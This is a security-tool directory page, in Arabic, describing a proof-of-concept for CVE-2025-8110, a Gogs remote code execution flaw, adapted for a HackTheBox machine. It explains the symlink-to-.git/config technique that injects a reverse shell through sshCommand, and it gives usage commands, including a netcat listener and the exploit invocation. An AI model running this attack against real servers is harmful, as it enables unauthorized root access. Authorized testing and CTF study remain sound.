Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-8110 — استغلال خدمة Gogs والحصول على مستخدم root | Kitploit
أدوات/GitHubGitHub/ixzodiak/cve-2025-8110
الاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليمالفريق الأحمرأداة الوصول عن بعد
GitHubixzodiak/cve-2025-8110

CVE-2025-8110

استغلال خدمة Gogs والحصول على مستخدم root

عرض المستودع
منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-8110 — PoC لثغرة RCE في Gogs (Silentium / HackTheBox)

إخلاء مسؤولية: صُمّمت هذه الأداة حصريًا للأغراض التعليمية واختبار الاختراق المصرّح به. استخدمها فقط ضد الأنظمة التي لديك إذن صريح لاختبارها.


هذه نسخة معدّلة من zAbuQasem/gogs-CVE-2025-8110، تم تكييفها للعمل ضد جهاز Silentium على HackTheBox. تطلّب الـ PoC الأصلي تعديلات للتعامل مع إعدادات Gogs الخاصة بجهاز Silentium وسير المصادقة الخاص به.


الثغرة

CVE-2025-8110 هي ثغرة تنفيذ برمجيات عن بُعد (Remote Code Execution) في Gogs، وهي خدمة Git مستضافة ذاتيًا.

لا تتحقق نقطة نهاية واجهة برمجة التطبيقات (API) الخاصة بتحديث الملفات في Gogs (PUT /api/v1/repos/.../contents/<file>) من كون الملف الهدف رابطًا رمزيًا (symlink). يمكن لمهاجم موثّق دفع رابط رمزي إلى مستودع يشير إلى .git/config، ثم استخدام الواجهة البرمجية لاستبداله بحمولة خبيثة. تحقن الحمولة أمر sshCommand مخصصًا في إعدادات git، وينفّذه Gogs من جهة الخادم في المرة التالية التي ينفّذ فيها عملية SSH على ذلك المستودع، مما يؤدي إلى تنفيذ برمجيات عن بُعد.


ماذا يفعل الـ PoC

  1. يصادق على Gogs ويستخرج رمز CSRF من صفحة تسجيل الدخول.
  2. يولّد رمز API خاص بـ Gogs عبر صفحة إعدادات المستخدم.
  3. ينشئ مستودعًا جديدًا عبر الواجهة البرمجية مع تفعيل SSH.
  4. يستنسخ المستودع محليًا، ويزرع رابطًا رمزيًا (malicious_link -> .git/config)، ويدفعه إلى المستودع.
  5. يستدعي واجهة تحديث الملفات (file-update API) على الرابط الرمزي، لكتابة ملف .git/config خبيث يحتوي على sshCommand = <reverse shell>.
  6. يتبع Gogs الرابط الرمزي ويكتب فوق ملف .git/config الخاص به، مما يؤدي إلى تشغيل الصدفة عند عملية SSH التالية.

الاستخدام

تثبيت المتطلبات:

root@kitploit:~
pip install -r requirements.txt

تشغيل مستمع:

root@kitploit:~
nc -lvnp <PORT>

تشغيل الاستغلال:

root@kitploit:~
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD>

اختياري — التوجيه عبر Burp Suite:

root@kitploit:~
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD> -x
تنزيل الأداة
الخيارالوصف
-uعنوان Gogs الأساسي
-lhعنوان IP الخاص بك كمهاجم (مضيف الصدفة العكسية)
-lpمنفذ المستمع لديك
-unاسم المستخدم المسجّل لديك في Gogs
-pwكلمة مرور Gogs الخاصة بك
-x(اختياري) توجيه الحركة عبر Burp على localhost:8080